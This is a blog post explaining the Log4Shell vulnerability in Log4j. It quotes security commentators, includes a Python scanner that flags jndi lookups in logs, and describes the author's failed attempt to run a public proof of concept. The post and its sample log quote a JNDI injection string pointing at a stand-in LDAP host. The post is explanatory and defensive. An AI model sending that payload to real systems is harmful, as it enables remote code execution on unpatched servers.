Log4J/Log4Shell — A Software Feature with Unintended Consequences

Evan SooHoo
4 min read · Dec 21, 2021
Source of original picture: https://github.com/kozmer/log4j-shell-poc

According to an article by CNN, hundreds of millions of devices are vulnerable to the Log4Shell exploit, and companies like Apple, IBM, Oracle, Cisco, Google, and Amazon all use the software it targets. Log4j is one of the most popular logging libraries, and is so ubiquitous that even developers who do not work directly with it may be running vulnerable code.

One thing the CNN article does not explain is how the attack actually works and how to carry it out. Fortunately, the more technical side of the Internet has had a field day with this one. Here is a video, for example, of someone using the Log4j vulnerability to hack a computer via Minecraft. I should note that all these people are only simulating the hack on their own systems — not illegally hacking.

The 30-second version (from MalwareTech):

  • This vulnerability affects millions of Java applications (and, as the CNN article states, has far-reaching implications)
  • Log4j evaluates “lookup” strings like “${java:version}” into the actual version
  • JNDI allows a user to fetch remote objects from a server
  • So, using a string like ${jndi:ldap://hax.local:1389/}, an attacker can load malware onto a vulnerable machine
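As an added example (not code from this post or from MalwareTech), here is a small Python scanner that walks log lines, pulls out every ${...} lookup expression with brace matching, and flags the ones whose prefix is jndi; the sample lines are constructed, with the second reusing the string quoted above.

```python
from dataclasses import dataclass

# Constructed sample log lines (not from the original post). The second
# line carries the lookup string the post quotes from MalwareTech.
SAMPLE_LOG = """\
2021-12-10T12:00:01Z INFO  user-agent=Mozilla/5.0 path=/login
2021-12-10T12:00:02Z INFO  user-agent=${jndi:ldap://hax.local:1389/} path=/login
2021-12-10T12:00:03Z DEBUG build=${java:version} path=/health
"""

@dataclass
class Lookup:
    text: str       # the full ${...} expression as it appeared
    prefix: str     # the part before the first colon, e.g. "jndi" or "java"
    is_jndi: bool   # True when the prefix is the dangerous JNDI lookup

def extract_lookups(line: str) -> list[Lookup]:
    """Return every ${...} lookup in a line. Braces are matched so a
    lookup nested inside another one is captured as a single expression."""
    found = []
    i = 0
    while True:
        start = line.find("${", i)
        if start < 0:
            return found
        depth, j = 0, start
        while j < len(line):
            if line.startswith("${", j):
                depth += 1
                j += 2
                continue
            if line[j] == "}":
                depth -= 1
                if depth == 0:
                    break
            j += 1
        else:
            return found            # unterminated lookup: ignore the rest
        text = line[start:j + 1]
        prefix = text[2:-1].split(":", 1)[0].strip().lower()
        found.append(Lookup(text, prefix, prefix == "jndi"))
        i = j + 1

def find_jndi_lines(log: str) -> list[tuple[int, str]]:
    """(line number, lookup text) for every line carrying a jndi: lookup."""
    hits = []
    for n, line in enumerate(log.splitlines(), 1):
        for lk in extract_lookups(line):
            if lk.is_jndi:
                hits.append((n, lk.text))
    return hits
```

Running it over SAMPLE_LOG reports only line 2; the ${java:version} lookup on line 3 is extracted but not flagged, which is the distinction a triage script needs to make.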

Below is a demonstration by MalwareTech, the cybersecurity researcher responsible for inadvertently activating the kill switch on WannaCrypt several years ago and buying critical time for impacted hospitals and other targets.

A three-minute video that somehow manages to explain everything without being overly technical.

This is all the result of a feature, not a bug.

How Bad Is It?

“Security Now!” is such a respected podcast that you can actually listen to them to fulfill CompTIA credits. Normally, I think listening to it is a little bit like listening to the news…I think of DarkNetDiaries as the less technical, much more entertaining version of “Security Now.”

But with this episode, I think they really hit the nail on the head.

“Log4j” is a very widely used — as in many many millions of installations — kinda everywhere, open source server-logging JAVA framework. Its job is to log things that happen on a JAVA server. Like the contents of form submissions or HTTP query metadata details, and such…So how widespread is this? Log4j is included with almost all the enterprise products released by the Apache Software Foundation, such as Apache Struts, Flink, Druid, Flume, Solr, Kafka, Dubbo, and probably many more. Open-source projects like Redis, ElasticSearch, Elastic Logstash, the NSA’s Ghidra, and countless others use Log4j in some capacity. And all of the companies that use any of these products are indirectly vulnerable to the Log4Shell exploit, even if some may not be aware of it because Log4j is buried deeply in their infrastructure.

They go on to say that this vulnerability could not be worse, at least in terms of score (the description to this post was their quote), that Apple cloud services were compromised in a research study simply by changing the name of an iPhone, and that the same kind of attack was successfully carried out by changing the name of a Tesla automobile. In conclusion to their show:

A default data logging component that’s deeply embedded into pervasively used JAVA-based open source software has been found to contain an incredibly dangerous and readily exploitable feature which allows remotely located attackers to cause the execution of any code they design on a target’s system. And because this is deliberately universal cross-platform JAVA code, its opportunity for exploitation is also universal and cross-platform.

An Experiment

This guy exploits Log4j to seize control of a server…at least in theory. In these types of demonstrations, I typically see someone open up the calculator in a simulated environment, or type “ls.” These aren’t supposed to be cute demos; they stand in for running a secret cryptocurrency miner or scanning your computer for passwords.

There is now a publicly available, open source proof of concept you can download online. I think I got…close to getting it to work.

I know, I am batting a thousand between that and the CakeChat repository (stripped-down version of Replika AI) I could not figure out how to run. But the proof of concept demonstration assumes the user is running Ubuntu, or another flavor of Linux. On a Mac, there are subtle differences in how docker and even CLI tools like netcat work. On Windows? No idea. If you want to see this done successfully, watch the Linux video above.

First, I wanted to downgrade to Java 8 without putting the system in danger. Fortunately, on a Mac you do not need to downgrade Java. I modified the exploitation script in Python to match the layout of an OSX machine.

…Meaning I changed like three lines of code so that the paths were different. That is all.

I got everything to run, but I could not gain remote access. Oh well. Maybe next week.

My forked repo

Closing Thoughts

This guy is a legend.

Serious dangers and far-reaching implications aside, this could be a good way to get people interested in technology. Understanding basic utilities and bits and pieces of coding becomes a means to an end…and the end is entertaining to watch.

Just imagine how thrilled the bug bounty researcher who actually discovered this in Minecraft must have been. Unfortunately, their excitement probably pales in comparison to the hackers who secretly found it first.

As for me, I still have a lot more to do/try in this area. In the meantime, I could benefit from setting up test environments, and maybe trying to get a little more mature with how I troubleshoot.

See you next week.
